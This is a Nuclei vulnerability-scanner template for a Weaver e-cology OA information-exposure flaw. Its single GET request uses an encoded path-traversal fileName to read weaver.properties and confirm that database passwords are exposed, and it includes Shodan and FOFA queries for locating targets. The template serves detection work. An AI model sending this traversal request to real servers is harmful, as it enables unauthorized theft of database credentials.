id: ecology-info-leak

info:
  name: Ecology  - Information Exposure
  author: qianbenhyu
  severity: high
  description: |
    The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).
  reference:
    - https://github.com/xinyisleep/pocscan/blob/main/%E6%B3%9B%E5%BE%AE/oa%E6%B3%9B%E5%BE%AE0day%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.py
  metadata:
    verified: true
    max-request: 1
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,unauth,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ecology.password"
          - "ecology.charset"
        condition: and

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100f4b8bb749fd79aea26a355c822283699f5d0596aad0483647a314023e376604e022100f180eebc65e0dc135cdc4c37c87552f2acd76935990f718365337e68d4c22e60:922c64590222798bb761d5b6d8e72950